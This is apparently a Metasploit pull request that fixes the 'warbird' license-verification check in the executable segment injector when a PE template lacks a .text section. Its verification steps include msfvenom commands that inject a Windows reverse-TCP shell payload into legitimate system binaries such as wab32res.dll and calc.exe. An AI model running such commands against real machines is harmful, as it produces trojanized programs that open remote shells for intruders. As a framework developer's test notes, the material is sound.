### PR TITLE
Fix #7569, Fix warbird check for missing text section

### DIFF
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -137,7 +137,9 @@ module Exe
       # .text:004136C1                 add     eax, 0Ch
       pattern = "\x64\xA1\x30\x00\x00\x00\x2B\xCA\xD1\xF9\x8B\x40\x0C\x83\xC0\x0C"
       section = pe.sections.find { |s| s.name.to_s == '.text' }
-      if section && section.encoded.pattern_scan(pattern).blank?
+      if section.nil?
+        return false
+      elsif section && section.encoded.pattern_scan(pattern).blank?
         return false
       end
 


### PR DESCRIPTION
Fix #7569

This fixes a bug in the warbird check when the text section is missing in the file. Instead of flagging the file as something with license verification, it should return false.

Verification

- [x] Prepare a wab32res.dll from Windows Server 2003 in ```C:\Windows\System32\```
- [x] Do: ```./msfvenom -p windows/shell/reverse_tcp lhost=192.168.100.13 -x [path to wab32res.dll] -f dll -k -o /tmp/test.dll```
- [x] It should be able to generate a file
- [x] Parepare a calc.exe from Windows 8.1
- [x] Do: ```./msfvenom -p windows/shell/reverse_tcp lhost=192.168.100.13 -x [path to calc.exe] -f dll -k -o /tmp/test.dll```
- [x] It should flag with this message: ```Error: The template to inject to appears to have license verification (warbird)```